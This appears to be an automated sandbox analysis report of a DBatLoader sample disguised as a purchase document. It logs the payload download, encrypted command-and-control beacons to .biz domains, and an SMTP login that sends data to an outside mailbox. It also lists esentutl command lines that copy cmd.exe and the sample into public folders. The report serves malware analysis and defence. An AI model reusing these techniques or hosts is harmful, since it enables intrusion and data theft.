                                                                                                                                                                                                                        Data Ascii: se;let pageOptions = {'pubId': 'dp-teaminternet01','resultsPageBaseUrl': '//' + location.host + '/?ts=','fontFamily': 'arial','optimizeTerms': true,'maxTermLength': 40,'adtest': true,'clicktrackUrl': '//' + location.host + '/track.php?','attri
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127651930 CET1236INData Raw: 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 63 61 66 3d 31 26 74 6f 67 67 6c 65 3d 62 6c 6f 63 6b 26 72 65 61 73 6f 6e 3d 6f 74 68 65 72 26 75 69 64 3d 22 20 2b 20 65 6e
                                                                                                                                                                                                                        Data Ascii: main=" + encodeURIComponent(domain) + "&caf=1&toggle=block&reason=other&uid=" + encodeURIComponent(uniqueTrackingID));}if (status.errorcode && !status.error_code) {status.error_code = status.errorcode;}if (status.error_code) {ajaxQuery(scriptP
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127664089 CET1236INData Raw: 61 78 51 75 65 72 79 28 73 63 72 69 70 74 50 61 74 68 20 2b 20 22 2f 74 72 61 63 6b 2e 70 68 70 3f 64 6f 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 63 61 66 3d 31 26 74
                                                                                                                                                                                                                        Data Ascii: axQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=adult&uid=" + encodeURIComponent(uniqueTrackingID));} else if ((status.adult === false || status.adult == "false") && isAdult) {ajaxQuery(scriptPath + "/tr
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.246736050 CET1236INData Raw: 20 28 6c 65 74 20 6b 65 79 20 69 6e 20 6f 62 6a 32 29 6f 62 6a 31 5b 6b 65 79 5d 20 3d 20 6f 62 6a 32 5b 6b 65 79 5d 3b 72 65 74 75 72 6e 20 6f 62 6a 31 3b 7d 3b 66 75 6e 63 74 69 6f 6e 20 67 65 74 58 4d 4c 68 74 74 70 28 29 20 7b 6c 65 74 20 78
                                                                                                                                                                                                                        Data Ascii: (let key in obj2)obj1[key] = obj2[key];return obj1;};function getXMLhttp() {let xmlHttp = null;try {xmlHttp = new XMLHttpRequest();} catch (e) {try {xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");} catch (ex) {try {xmlHttp = new ActiveXObject(
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.457324028 CET357OUTGET /fauopp?usid=18&utid=28672494417 HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Host: ww12.przvgke.biz
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.960787058 CET825INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Accept-Ch: viewport-width
                                                                                                                                                                                                                        Accept-Ch: dpr
                                                                                                                                                                                                                        Accept-Ch: device-memory
                                                                                                                                                                                                                        Accept-Ch: rtt
                                                                                                                                                                                                                        Accept-Ch: downlink
                                                                                                                                                                                                                        Accept-Ch: ect
                                                                                                                                                                                                                        Accept-Ch: ua
                                                                                                                                                                                                                        Accept-Ch: ua-full-version
                                                                                                                                                                                                                        Accept-Ch: ua-platform
                                                                                                                                                                                                                        Accept-Ch: ua-platform-version
                                                                                                                                                                                                                        Accept-Ch: ua-arch
                                                                                                                                                                                                                        Accept-Ch: ua-model
                                                                                                                                                                                                                        Accept-Ch: ua-mobile
                                                                                                                                                                                                                        Accept-Ch-Lifetime: 30
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:55 GMT
                                                                                                                                                                                                                        Server: Caddy
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_T6cLo7zYd6VxkyX5D7YTlF7rCMU5iTRTcMcDAcWhkhzoMxAI52XbayhHdJP3m8mgaS9l0VK8c7G1Pzo5Wv8NpQ==
                                                                                                                                                                                                                        X-Domain: przvgke.biz
                                                                                                                                                                                                                        X-Pcrew-Blocked-Reason:
                                                                                                                                                                                                                        X-Pcrew-Ip-Organization: CenturyLink
                                                                                                                                                                                                                        X-Subdomain: ww12
                                                                                                                                                                                                                        Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.9 | 49730 | 199.59.243.227 | 80 | 7996 | C:\Users\Public\Libraries\ymafvvdS.pif
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:52.882267952 CET | 356 | OUT | GET /cairvr?usid=18&utid=28672493914 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Host: ww7.przvgke.biz
Dec 10, 2024 07:05:53.979266882 CET | 1236 | IN | HTTP/1.1 200 OK
date: Tue, 10 Dec 2024 06:05:53 GMT
content-type: text/html; charset=utf-8
content-length: 1138
x-request-id: bc0b2f68-753d-4be3-be81-809885932c05
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MjlSp8QbG/3KFaHTkUJ2cd3nvIhuMLWt+Sn0wvyxUwU8mTozxi/rDVYF4zRohC/QtaPyf+sdCnKSpjTi9+qGbg==
set-cookie: parking_session=bc0b2f68-753d-4be3-be81-809885932c05; expires=Tue, 10 Dec 2024 06:20:53 GMT; path=/
Data Raw: [hex dump omitted]
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MjlSp8QbG/3KFaHTkUJ2cd3nvIhuMLWt+Sn0wvyxUwU8mTozxi/rDVYF4zRohC/QtaPyf+sdCnKSpjTi9+qGbg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Dec 10, 2024 07:05:53.979295015 CET | 572 | IN | Data Raw: [hex dump omitted]
Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmMwYjJmNjgtNzUzZC00YmUzLWJlODEtODA5ODg1OTMyYzA1IiwicGFnZV90aW1lIjoxNzMzODEwNzUzLCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.9 | 49731 | 18.141.10.107 | 80 | 7996 | C:\Users\Public\Libraries\ymafvvdS.pif
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:54.839410067 CET | 353 | OUT | POST /uoxisrajk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Dec 10, 2024 07:05:54.839492083 CET | 802 | OUT | Data Raw: [802-byte binary request body; hex and ASCII dumps omitted]
Dec 10, 2024 07:05:56.864387035 CET | 412 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 Dec 2024 06:05:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=463b86ae87d60229307798bd36f88c72|8.46.123.228|1733810756|1733810756|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 49732 | 18.141.10.107 | 80 | 7276 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:56.508774042 CET | 353 | OUT | POST /jedofahyn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 10, 2024 07:05:56.508833885 CET | 778 | OUT | Data Raw: 49 5b 36 23 d3 89 82 f7 fe 02 00 00 1f 97 a1 a0 0c d3 42 4e 14 65 e8 84 8f 9a 85 c3 e2 db 96 22 ca 22 a8 b5 1e ef 7b f8 41 7d fb c5 45 05 f3 89 ed 6e d5 72 5d e5 60 bb 98 b1 ce 09 7b 2a 5e 37 64 8c d0 41 cf bc b3 1b 61 67 fb da dc 61 eb 61 a1 45
Data Ascii: I[6#BNe""{A}Enr]`{*^7dAagaaEDFFxF[U<'fmdI/b?&3-E.65v=j5Sh|>tn(Q$wu)0v8dmiz?vJ'{m
Dec 10, 2024 07:05:58.552304983 CET | 412 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 Dec 2024 06:05:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e1acb035a8db29c618f735807b3e4bad|8.46.123.228|1733810758|1733810758|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 49733 | 82.112.184.197 | 80 | 7996 | C:\Users\Public\Libraries\ymafvvdS.pif

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:58.465235949 CET | 353 | OUT | POST /ahrvaxreoca HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Dec 10, 2024 07:05:58.465343952 CET | 802 | OUT | Data Raw: 7a bb a6 cb e0 89 82 a7 16 03 00 00 d7 d3 9b a8 69 f7 22 db d1 75 5f 4b 46 58 65 0a 35 f5 e9 2e 29 8b 48 2b cf 15 8e d3 7b 09 d2 3a 6c 15 31 0f 7d 9f e1 4c c0 f5 ca 65 0a 7a 2d ca 24 bf 4d 64 3e 67 10 82 f9 ac 01 a3 67 8b 60 ec 29 e6 2e 45 69 fd
Data Ascii: zi"u_KFXe5.)H+{:l1}Lez-$Md>gg`).Ei56)5o,F^N{"b{-hxT4=#j\hRGH]R=SMDG5R6,e3j\74Jpj3a^"PvTJ1)>L};,q


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.9 | 49734 | 82.112.184.197 | 80 | 7276 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:59.216613054 CET | 353 | OUT | POST /tjgeolaydho HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 10, 2024 07:05:59.216656923 CET | 778 | OUT | Data Raw: 0f d1 1a c3 aa 03 be 69 fe 02 00 00 bd 5c 0a 40 d7 2c 3c c8 89 9a 2a 98 92 c5 e4 d4 00 c5 fd b2 af 7b 5d 8b 72 67 2b 51 ae 7d 59 4c be 2f c5 1c 79 b0 1a 62 ff ea ad 43 41 cf d3 f7 f2 0a 26 4d 9d 1b 56 a2 84 57 b8 bb 79 d7 c0 6b e0 e0 06 30 84 eb
Data Ascii: i\@,<*{]rg+Q}YL/ybCA&MVWyk0WN}+aYe7,pU}7EU;AR)gHI#f36vHsi-ky^!OH_}]R~0K>c


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.9 | 49736 | 82.112.184.197 | 80 | 7996 | C:\Users\Public\Libraries\ymafvvdS.pif

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:06:20.516671896 CET | 350 | OUT | POST /bwbcqohd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Dec 10, 2024 07:06:20.516706944 CET | 802 | OUT | Data Raw: e7 09 5d a6 ad e4 90 05 16 03 00 00 9d ea bb da d1 db 32 de 2c bd a9 39 ed be 70 84 01 dd 84 5e bd ba 08 4c 78 28 e1 11 cc c2 d0 47 f7 2d e5 89 e5 7f 98 a9 ae a1 3b 47 6c ce 24 18 88 45 e0 9b e8 8b c9 97 5d df 87 85 b4 03 2a 8a b0 c8 74 52 7d df
Data Ascii: ]2,9p^Lx(G-;Gl$E]*tR}s:k?1K\ B<`+*8w1Lus0#wV0zlIKh]7RKs&WAhR+oQmDpTzZOB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.9 | 49737 | 82.112.184.197 | 80 | 7276 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:06:21.615621090 CET | 358 | OUT | POST /pfoxkxwneqnmhcsc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 10, 2024 07:06:21.615957975 CET | 778 | OUT | Data Raw: e0 4a cc b2 ac e8 28 40 fe 02 00 00 a2 d7 ed 4c 1b 2c ff 05 52 da 52 3e 6b d3 ec 01 9f 4c 62 01 37 2a 63 c5 b2 92 1a f5 9e 93 d6 98 7a ba 5e 14 a2 6e 5b b1 56 d6 72 e9 22 fd 6d 75 16 7f 3e 3f 09 a5 a7 a8 d2 d3 a3 8c 53 23 52 38 56 b0 1b 98 90 47
Data Ascii: J(@L,RR>kLb7*cz^n[Vr"mu>?S#R8VGlMhW-1|l{%DD:Z,c(v(U.acY~|rF&TnkP^3Bku!Dh).$qz7R[1!H/bYTaN~5e(5u-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.9 | 49741 | 82.112.184.197 | 80 | 7996 | C:\Users\Public\Libraries\ymafvvdS.pif

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:06:44.091917992 CET | 358 | OUT | POST /goescaydbiatn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Dec 10, 2024 07:06:44.091957092 CET | 802 | OUT | Data Raw: 7f da 05 be 1a df b0 cf 16 03 00 00 dd 56 00 fb 70 60 da 0e b8 a9 18 70 05 92 da ee b8 96 0b fb 5f 09 30 70 24 9d 84 86 d5 26 91 8f 6c 44 e5 9a 36 83 70 c4 76 ec e8 83 48 fb 22 16 a6 c5 36 5a 46 84 35 e8 95 34 4c 18 c1 c7 0e 61 ef df ca 46 c6 54
Data Ascii: Vp`p_0p$&lD6pvH"6ZF54LaFTjEVH<z]60BTq{'>jCJ>/%4*kFAVSD$_1E|%1@W,C@*F,IE[O0lk[Vg S;QP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.9 | 49742 | 82.112.184.197 | 80 | 7276 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:06:44.471502066 CET | 351 | OUT | POST /ewvwgr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 10, 2024 07:06:44.471527100 CET | 778 | OUT | Data Raw: da 70 eb 34 db 50 e0 d8 fe 02 00 00 27 66 57 f4 32 7e 18 d5 7c 0e c5 67 d0 ca 04 5b 04 d8 fd f9 10 9c 2d 9e cf 3f 27 74 a0 aa 8a 1d 73 05 ec 9d 66 5d d4 62 61 07 16 91 42 98 03 0b 5c b8 73 f7 3a 5a 79 e2 3f d7 3d 87 c0 2e a9 6a 8e 89 dd 56 5f ce
Data Ascii: p4P'fW2~|g[-?'tsf]baB\s:Zy?=.jV_|g6,5qrC;xf7Vl0n{l|oI0l78+TnBx5m!M4/$%j.[@.Sqe4'#KtO!G!ta:p5%Rsu|i


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.9 | 49743 | 82.112.184.197 | 80 | 7996 | C:\Users\Public\Libraries\ymafvvdS.pif

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:07:06.178466082 CET | 358 | OUT | POST /ovwmjligotchf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Dec 10, 2024 07:07:06.178495884 CET | 802 | OUT | Data Raw: 1c 59 f7 4c 30 8a 61 5c 16 03 00 00 8a 8b 03 53 62 ef 8b f1 6c 27 95 e5 49 c2 bc 3b 99 bd 75 7d da dd a1 bf 7a 2d 35 bc 83 48 59 6f f8 75 28 17 98 47 c3 a9 8d 58 6e 3c f7 e7 ce de 9a a6 16 a8 d0 97 f0 4f c3 48 1f 96 25 30 8b 5c 1c eb 20 e2 8d 7c
Data Ascii: YL0a\Sbl'I;u}z-5HYou(GXn<OH%0\ |eH{LQ9w6\xypW[644l6B&I'_Q#iO]nf_5>D+g?w8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.9 | 49744 | 82.112.184.197 | 80 | 7276 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:07:06.578418016 CET | 350 | OUT | POST /eooel HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 10, 2024 07:07:06.578449965 CET | 778 | OUT | Data Raw: (binary, 778 bytes)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49707 | 41.185.8.252 | 443 | 7608 | C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 06:05:23 UTC | 171 | OUT | GET /royal/233_Sdvvfamydeo HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: lwaziacademy.com
2024-12-10 06:05:24 UTC | 183 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 Dec 2024 06:05:24 GMT
Content-Length: 2192512
Connection: close
Last-Modified: Sat, 07 Dec 2024 07:53:23 GMT
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49712 | 104.21.67.152 | 443 | 7996 | C:\Users\Public\Libraries\ymafvvdS.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-10 06:05:38 UTC | 85 | OUT | GET /xml/8.46.123.228 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-10 06:05:38 UTC | 874 | IN | HTTP/1.1 200 OK
Date: Tue, 10 Dec 2024 06:05:38 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 688161
Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xb%2FBRmuWx7TOy6AMLgUxDqkdtamfZDxbkoRSY4HAWCXXvvi6AxJQcEWxcKxCkGAMMGg4kqkCwcVqY3gWatc0skv0SVnEAeivob186MCEMaptDCofOOWjyRGLVY%2BTo7Tt0l3TD0DZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8efb0b5a1b3a42cd-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1718&rtt_var=659&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1643218&cwnd=241&unsent_bytes=0&cid=3b81f69f6ce4e57f&ts=457&x=0"
2024-12-10 06:05:38 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Dec 10, 2024 07:05:48.390676022 CET | 587 | 49725 | 103.20.200.105 | 192.168.2.9 | 220-cp-wc15.syd02.ds.network ESMTP Exim 4.96.2 #2 Tue, 10 Dec 2024 17:05:48 +1100
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Dec 10, 2024 07:05:48.390891075 CET | 49725 | 587 | 192.168.2.9 | 103.20.200.105 | EHLO 172892
Dec 10, 2024 07:05:48.924350023 CET | 587 | 49725 | 103.20.200.105 | 192.168.2.9 | 250-cp-wc15.syd02.ds.network Hello 172892 [8.46.123.228]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Dec 10, 2024 07:05:48.925425053 CET | 49725 | 587 | 192.168.2.9 | 103.20.200.105 | AUTH login aGVsbG9AdGhlbWF0bWFuLmNvbS5hdQ==
Dec 10, 2024 07:05:49.446821928 CET | 587 | 49725 | 103.20.200.105 | 192.168.2.9 | 334 UGFzc3dvcmQ6
Dec 10, 2024 07:05:49.992284060 CET | 587 | 49725 | 103.20.200.105 | 192.168.2.9 | 235 Authentication succeeded
Dec 10, 2024 07:05:49.992652893 CET | 49725 | 587 | 192.168.2.9 | 103.20.200.105 | MAIL FROM:<hello@thematman.com.au>
Dec 10, 2024 07:05:50.512968063 CET | 587 | 49725 | 103.20.200.105 | 192.168.2.9 | 250 OK
Dec 10, 2024 07:05:50.513339043 CET | 49725 | 587 | 192.168.2.9 | 103.20.200.105 | RCPT TO:<joyal005@yahoo.com>
Dec 10, 2024 07:05:51.033073902 CET | 587 | 49725 | 103.20.200.105 | 192.168.2.9 | 250 Accepted
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.033217907 CET49725587192.168.2.9103.20.200.105DATA
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.553322077 CET58749725103.20.200.105192.168.2.9354 Enter message, ending with "." on a line by itself
                                                                                                                                                                                                                        Dec 10, 2024 07:05:51.554318905 CET49725587192.168.2.9103.20.200.105.
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.330883026 CET58749725103.20.200.105192.168.2.9250 OK id=1tKtNX-007pEZ-0v
Target ID: 0
Start time: 01:05:17
Start date: 10/12/2024
Path: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe"
Imagebase: 0x400000
File size: 1'264'128 bytes
MD5 hash: CBEEA46A413D2F3D7166104D79788062
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 3
Start time: 01:05:30
Start date: 10/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ymafvvdS.cmd" "
Imagebase: 0xc50000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 01:05:30
Start date: 10/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 01:05:31
Start date: 10/12/2024
Path: C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit): true
Commandline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Imagebase: 0x370000
File size: 352'768 bytes
MD5 hash: 5F5105050FBE68E930486635C5557F84
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 01:05:32
Start date: 10/12/2024
Path: C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit): true
Commandline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe /d C:\\Users\\Public\\Libraries\\Sdvvfamy.PIF /o
Imagebase: 0x370000
File size: 352'768 bytes
MD5 hash: 5F5105050FBE68E930486635C5557F84
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 7
Start time: 01:05:32
Start date: 10/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
